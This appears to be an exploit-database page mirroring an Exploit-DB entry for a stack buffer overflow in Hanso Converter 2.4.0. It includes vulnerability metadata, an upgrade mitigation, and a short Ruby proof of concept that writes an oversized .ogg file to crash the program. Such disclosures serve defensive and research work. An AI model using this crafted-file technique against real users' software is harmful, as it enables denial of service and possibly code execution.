header-logo
Suggest Exploit
vendor:
Hanso Converter
by:
Necmettin COSKUN
7,8
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Hanso Converter
Affected Version From: 2.4.0
Affected Version To: 2.4.0
Patch Exists: YES
Related CWE: N/A
CPE: hanso-converter
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2
2020

Hanso Converter 2.4.0 Buffer Overflow(DoS)

Hanso Converter 2.4.0 is vulnerable to a buffer overflow vulnerability which can be exploited to cause a denial of service. The vulnerability is caused due to a boundary error when handling specially crafted .ogg files. This can be exploited to cause a stack-based buffer overflow by tricking a user into opening a specially crafted .ogg file. Successful exploitation of this vulnerability may allow an attacker to execute arbitrary code in the context of the application.

Mitigation:

Upgrade to the latest version of Hanso Converter.
Source

Exploit-DB raw data:

#!/usr/bin/env ruby
# coding:UTF-8
# Exploit Title:Hanso Converter 2.4.0 Buffer Overflow(DoS)
# Author:Necmettin COSKUN => twitter.com/babayarisi
# Vendor :www.hansotools.com
# Software link:http://www.hansotools.com/downloads/hanso-converter-setup.exe
# version: 2.4.0
# Tested on: windows XP sp2

DENEME = "A" * 1337

File.open('hanzo.ogg', 'w') do |bofdosya|  
bofdosya.puts (DENEME)
bofdosya.close()
end

Navigation

Suggest Exploit

Services By CQR